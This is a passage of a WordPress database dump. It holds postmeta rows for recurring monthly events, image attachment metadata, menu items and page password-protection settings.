'_RTECmaxRegistrations','30'),(130472,263627,'boldgrid_hide_page_title','0'),(130473,263627,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-19\";s:14:\"EventStartDate\";s:19:\"2021-02-16 18:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-16 19:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130460,263627,'protect_children',''),(130461,263627,'protect_children',''),(130462,263627,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953785;s:12:\"_EventOrigin\";i:1611953785;s:13:\"_thumbnail_id\";i:1611953785;s:26:\"_RTECregistrationsDisabled\";i:1611953785;s:17:\"_RTECdeadlineType\";i:1611953785;s:19:\"_RTECwhoCanRegister\";i:1611953785;s:23:\"_RTEClimitRegistrations\";i:1611953785;s:21:\"_RTECmaxRegistrations\";i:1611953785;s:24:\"boldgrid_hide_page_title\";i:1611953785;s:16:\"_EventRecurrence\";i:1611953785;s:17:\"_EventShowMapLink\";i:1611953785;s:13:\"_EventShowMap\";i:1611953785;s:20:\"_EventCurrencySymbol\";i:1611953785;s:22:\"_EventCurrencyPosition\";i:1611953785;s:10:\"_EventCost\";i:1611953785;s:9:\"_EventURL\";i:1611953785;s:14:\"_EventTimezone\";i:1611953785;s:12:\"_dp_original\";i:1611953785;s:13:\"_EventVenueID\";i:1611953785;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(130257,263628,'_EventStartDate','2021-09-21 18:00:00'),(130258,263628,'_EventStartDateUTC','2021-09-22 00:00:00'),(130259,263628,'_EventEndDate','2021-09-21 19:00:00'),(130260,263628,'_EventEndDateUTC','2021-09-22 01:00:00'),(130261,263628,'_EventDuration','3600'),(130490,263628,'_EventOrigin','events-calendar'),(151772,266078,'mec_bfixed_fields','a:0:{}'),(130492,263628,'_RTECregistrationsDisabled','1'),(130493,263628,'_RTECdeadlineType','start'),(130494,263628,'_RTECwhoCanRegister','any'),(130495,263628,'_RTEClimitRegistrations','0'),(130488,263628,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953785;s:12:\"_EventOrigin\";i:1611953785;s:13:\"_thumbnail_id\";i:1611953785;s:26:\"_RTECregistrationsDisabled\";i:1611953785;s:17:\"_RTECdeadlineType\";i:1611953785;s:19:\"_RTECwhoCanRegister\";i:1611953785;s:23:\"_RTEClimitRegistrations\";i:1611953785;s:21:\"_RTECmaxRegistrations\";i:1611953785;s:24:\"boldgrid_hide_page_title\";i:1611953785;s:16:\"_EventRecurrence\";i:1611953785;s:17:\"_EventShowMapLink\";i:1611953785;s:13:\"_EventShowMap\";i:1611953785;s:20:\"_EventCurrencySymbol\";i:1611953785;s:22:\"_EventCurrencyPosition\";i:1611953785;s:10:\"_EventCost\";i:1611953785;s:9:\"_EventURL\";i:1611953785;s:14:\"_EventTimezone\";i:1611953785;s:12:\"_dp_original\";i:1611953785;s:13:\"_EventVenueID\";i:1611953785;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(130508,263628,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263622;a:2:{s:9:\"timestamp\";i:1615917600;s:8:\"duration\";i:3600;}i:263623;a:2:{s:9:\"timestamp\";i:1618941600;s:8:\"duration\";i:3600;}i:263624;a:2:{s:9:\"timestamp\";i:1621360800;s:8:\"duration\";i:3600;}i:263625;a:2:{s:9:\"timestamp\";i:1623780000;s:8:\"duration\";i:3600;}i:263626;a:2:{s:9:\"timestamp\";i:1626804000;s:8:\"duration\";i:3600;}i:263627;a:2:{s:9:\"timestamp\";i:1629223200;s:8:\"duration\";i:3600;}i:263628;a:2:{s:9:\"timestamp\";i:1632247200;s:8:\"duration\";i:3600;}i:263629;a:2:{s:9:\"timestamp\";i:1634666400;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(130504,263628,'_EventURL',''),(130505,263628,'_EventTimezone','America/Denver'),(130506,263628,'_dp_original','263319'),(130507,263628,'_EventVenueID','263589'),(130502,263628,'_EventCurrencyPosition','prefix'),(130503,263628,'_EventCost',''),(130499,263628,'_EventShowMapLink','1'),(130500,263628,'_EventShowMap','1'),(130501,263628,'_EventCurrencySymbol',''),(130489,263628,'_EventOrigin','events-calendar'),(130496,263628,'_RTECmaxRegistrations','30'),(130497,263628,'boldgrid_hide_page_title','0'),(130498,263628,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-19\";s:14:\"EventStartDate\";s:19:\"2021-02-16 18:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-16 19:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130485,263628,'protect_children',''),(130486,263628,'protect_children',''),(130487,263628,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953785;s:12:\"_EventOrigin\";i:1611953785;s:13:\"_thumbnail_id\";i:1611953785;s:26:\"_RTECregistrationsDisabled\";i:1611953785;s:17:\"_RTECdeadlineType\";i:1611953785;s:19:\"_RTECwhoCanRegister\";i:1611953785;s:23:\"_RTEClimitRegistrations\";i:1611953785;s:21:\"_RTECmaxRegistrations\";i:1611953785;s:24:\"boldgrid_hide_page_title\";i:1611953785;s:16:\"_EventRecurrence\";i:1611953785;s:17:\"_EventShowMapLink\";i:1611953785;s:13:\"_EventShowMap\";i:1611953785;s:20:\"_EventCurrencySymbol\";i:1611953785;s:22:\"_EventCurrencyPosition\";i:1611953785;s:10:\"_EventCost\";i:1611953785;s:9:\"_EventURL\";i:1611953785;s:14:\"_EventTimezone\";i:1611953785;s:12:\"_dp_original\";i:1611953785;s:13:\"_EventVenueID\";i:1611953785;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(130527,263629,'_EventCurrencyPosition','prefix'),(130528,263629,'_EventCost',''),(130529,263629,'_EventURL',''),(130530,263629,'_EventTimezone','America/Denver'),(130290,263629,'_EventStartDate','2021-10-19 18:00:00'),(130291,263629,'_EventStartDateUTC','2021-10-20 00:00:00'),(130292,263629,'_EventEndDate','2021-10-19 19:00:00'),(130293,263629,'_EventEndDateUTC','2021-10-20 01:00:00'),(130294,263629,'_EventDuration','3600'),(137306,264262,'_edit_lock','1693498390:2'),(137307,264262,'_edit_last','2'),(145168,265426,'passster_activate_protection',NULL),(134093,264039,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:383;s:6:\"height\";i:547;s:4:\"file\";s:38:\"2021/03/mountain-eagle-zoomlogin-3.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"mountain-eagle-zoomlogin-3-210x300.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"mountain-eagle-zoomlogin-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"mountain-eagle-zoomlogin-3-383x250.jpg\";s:5:\"width\";i:383;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(130531,263629,'_dp_original','263319'),(130532,263629,'_EventVenueID','263589'),(130533,263629,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:8:{i:263622;a:2:{s:9:\"timestamp\";i:1615917600;s:8:\"duration\";i:3600;}i:263623;a:2:{s:9:\"timestamp\";i:1618941600;s:8:\"duration\";i:3600;}i:263624;a:2:{s:9:\"timestamp\";i:1621360800;s:8:\"duration\";i:3600;}i:263625;a:2:{s:9:\"timestamp\";i:1623780000;s:8:\"duration\";i:3600;}i:263626;a:2:{s:9:\"timestamp\";i:1626804000;s:8:\"duration\";i:3600;}i:263627;a:2:{s:9:\"timestamp\";i:1629223200;s:8:\"duration\";i:3600;}i:263628;a:2:{s:9:\"timestamp\";i:1632247200;s:8:\"duration\";i:3600;}i:263629;a:2:{s:9:\"timestamp\";i:1634666400;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:8;}'),(130515,263629,'_EventOrigin','events-calendar'),(151771,266078,'mec_reg_fields','a:0:{}'),(130517,263629,'_RTECregistrationsDisabled','1'),(130518,263629,'_RTECdeadlineType','start'),(130519,263629,'_RTECwhoCanRegister','any'),(130520,263629,'_RTEClimitRegistrations','0'),(130513,263629,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953785;s:12:\"_EventOrigin\";i:1611953785;s:13:\"_thumbnail_id\";i:1611953785;s:26:\"_RTECregistrationsDisabled\";i:1611953785;s:17:\"_RTECdeadlineType\";i:1611953785;s:19:\"_RTECwhoCanRegister\";i:1611953785;s:23:\"_RTEClimitRegistrations\";i:1611953785;s:21:\"_RTECmaxRegistrations\";i:1611953785;s:24:\"boldgrid_hide_page_title\";i:1611953785;s:16:\"_EventRecurrence\";i:1611953785;s:17:\"_EventShowMapLink\";i:1611953785;s:13:\"_EventShowMap\";i:1611953785;s:20:\"_EventCurrencySymbol\";i:1611953785;s:22:\"_EventCurrencyPosition\";i:1611953785;s:10:\"_EventCost\";i:1611953785;s:9:\"_EventURL\";i:1611953785;s:14:\"_EventTimezone\";i:1611953785;s:12:\"_dp_original\";i:1611953785;s:13:\"_EventVenueID\";i:1611953785;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(130524,263629,'_EventShowMapLink','1'),(130525,263629,'_EventShowMap','1'),(130526,263629,'_EventCurrencySymbol',''),(130514,263629,'_EventOrigin','events-calendar'),(130521,263629,'_RTECmaxRegistrations','30'),(130522,263629,'boldgrid_hide_page_title','0'),(130523,263629,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-19\";s:14:\"EventStartDate\";s:19:\"2021-02-16 18:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-16 19:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130510,263629,'protect_children',''),(130511,263629,'protect_children',''),(130512,263629,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953785;s:12:\"_EventOrigin\";i:1611953785;s:13:\"_thumbnail_id\";i:1611953785;s:26:\"_RTECregistrationsDisabled\";i:1611953785;s:17:\"_RTECdeadlineType\";i:1611953785;s:19:\"_RTECwhoCanRegister\";i:1611953785;s:23:\"_RTEClimitRegistrations\";i:1611953785;s:21:\"_RTECmaxRegistrations\";i:1611953785;s:24:\"boldgrid_hide_page_title\";i:1611953785;s:16:\"_EventRecurrence\";i:1611953785;s:17:\"_EventShowMapLink\";i:1611953785;s:13:\"_EventShowMap\";i:1611953785;s:20:\"_EventCurrencySymbol\";i:1611953785;s:22:\"_EventCurrencyPosition\";i:1611953785;s:10:\"_EventCost\";i:1611953785;s:9:\"_EventURL\";i:1611953785;s:14:\"_EventTimezone\";i:1611953785;s:12:\"_dp_original\";i:1611953785;s:13:\"_EventVenueID\";i:1611953785;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953785;}'),(145167,265426,'passster_protection_type','password'),(142814,265064,'original-file','2021/05/Autobiography-of-a-Modern-Prophet-updraft-pre-smush-original.jpg'),(134102,264081,'_wp_attached_file','2021/03/mountain-eagle-zoomlogin-5-362-517.jpg'),(134103,264081,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:362;s:6:\"height\";i:517;s:4:\"file\";s:46:\"2021/03/mountain-eagle-zoomlogin-5-362-517.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:46:\"mountain-eagle-zoomlogin-5-362-517-210x300.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"mountain-eagle-zoomlogin-5-362-517-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:46:\"mountain-eagle-zoomlogin-5-362-517-362x250.jpg\";s:5:\"width\";i:362;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(134092,264039,'_wp_attached_file','2021/03/mountain-eagle-zoomlogin-3.jpg'),(142813,265064,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:205;s:6:\"height\";i:307;s:4:\"file\";s:45:\"2021/05/Autobiography-of-a-Modern-Prophet.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Autobiography-of-a-Modern-Prophet-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Autobiography-of-a-Modern-Prophet-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:45:\"Autobiography-of-a-Modern-Prophet-205x300.jpg\";s:5:\"width\";i:205;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:45:\"Autobiography-of-a-Modern-Prophet-205x260.jpg\";s:5:\"width\";i:205;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Autobiography-of-a-Modern-Prophet-205x250.jpg\";s:5:\"width\";i:205;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(134094,264039,'original-file','2021/03/mountain-eagle-zoomlogin-3-updraft-pre-smush-original.jpg'),(130334,263622,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611953784;s:12:\"_EventOrigin\";i:1611953784;s:13:\"_thumbnail_id\";i:1611953784;s:26:\"_RTECregistrationsDisabled\";i:1611953784;s:17:\"_RTECdeadlineType\";i:1611953784;s:19:\"_RTECwhoCanRegister\";i:1611953784;s:23:\"_RTEClimitRegistrations\";i:1611953784;s:21:\"_RTECmaxRegistrations\";i:1611953784;s:24:\"boldgrid_hide_page_title\";i:1611953784;s:16:\"_EventRecurrence\";i:1611953784;s:17:\"_EventShowMapLink\";i:1611953784;s:13:\"_EventShowMap\";i:1611953784;s:20:\"_EventCurrencySymbol\";i:1611953784;s:22:\"_EventCurrencyPosition\";i:1611953784;s:10:\"_EventCost\";i:1611953784;s:9:\"_EventURL\";i:1611953784;s:14:\"_EventTimezone\";i:1611953784;s:12:\"_dp_original\";i:1611953784;s:13:\"_EventVenueID\";i:1611953784;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1611953784;}'),(134079,264024,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(134080,264024,'_menu_item_xfn',''),(134081,264024,'_menu_item_url',''),(134082,264020,'_oembed_b3718503196648b763868208772f1d7c','{{unknown}}'),(134083,264020,'_oembed_dc91c125ac4e8deb265f6086121de452','{{unknown}}'),(134095,264039,'smush-complete','1'),(134096,264039,'smush-info','The file was compressed from 38.96 KB to 37.80 KB saving 2.99 percent using WP-Optimize'),(134097,264039,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:39897;s:12:\"smushed-size\";i:38704;s:15:\"savings-percent\";d:2.9900000000000002131628207280300557613372802734375;}'),(145166,265425,'passster_protection_type','password'),(145165,265425,'passster_activate_protection',NULL),(142788,265063,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.4\";}'),(142789,265063,'mec_in_days',''),(134062,264020,'_wp_page_template','default'),(134063,264020,'passster_activate_protection',NULL),(134064,264020,'passster_protection_type','password'),(134065,264020,'boldgrid_hide_page_title','0'),(134066,264020,'boldgrid_in_page_containers','1'),(134067,264020,'bgseo_robots_index','index'),(134068,264020,'bgseo_robots_follow','follow'),(134069,264024,'protect_children',''),(134070,264024,'passster_activate_protection',NULL),(134071,264024,'passster_protection_type','password'),(134072,264024,'boldgrid_hide_page_title','0'),(134073,264024,'boldgrid_in_page_containers','1'),(134074,264024,'_menu_item_type','post_type'),(134075,264024,'_menu_item_menu_item_parent','0'),(134076,264024,'_menu_item_object_id','264020'),(134077,264024,'_menu_item_object','page'),(134078,264024,'_menu_item_target',''),(142792,265063,'mec_booking','a:0:{}'),(134045,264020,'protect_children',''),(134046,264020,'_edit_lock','1632431443:2'),(134047,264020,'_edit_last','2'),(137287,264411,'_form_id','13'),(137288,264411,'_seq_num','67'),(145164,265425,'passster_activate_global_protection',NULL),(141123,264450,'show_only_one_occurrence','0'),(141124,264450,'show_ongoing_events','0'),(141125,264447,'_edit_lock','1620591742:2'),(141126,264447,'_edit_last','2'),(160521,266604,'mec_more_info_target','_self'),(160520,266604,'mec_more_info_title',''),(160519,266604,'mec_more_info',''),(160517,266604,'mec_organizer_id','1'),(160518,266604,'mec_read_more',''),(160514,266604,'mec_color',''),(160515,266604,'mec_location_id','118'),(160516,266604,'mec_dont_show_map','0'),(160513,262102,'passster_activate_global_protection',NULL),(137020,264326,'_wp_attached_file','2021/04/2021-May-ESC-Seminar-2.jpg'),(143501,265134,'mec_event_date_submit','20210422105713'),(168232,267092,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-15\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-15\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(130605,263641,'protect_children',''),(130606,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130607,263641,'_EventOrigin','events-calendar'),(130608,263641,'protect_children',''),(130609,263641,'protect_children',''),(130610,263641,'protect_children',''),(130611,263641,'protect_children',''),(130612,263641,'protect_children',''),(130613,263641,'protect_children',''),(130614,263641,'protect_children',''),(130615,263641,'protect_children',''),(130616,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130645,263641,'_EventCurrencySymbol',''),(130617,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130644,263641,'_EventDuration','3600'),(130646,263641,'_EventCurrencyPosition','prefix'),(130618,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130643,263641,'_EventEndDateUTC','2021-01-14 03:00:00'),(130619,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130642,263641,'_EventStartDateUTC','2021-01-14 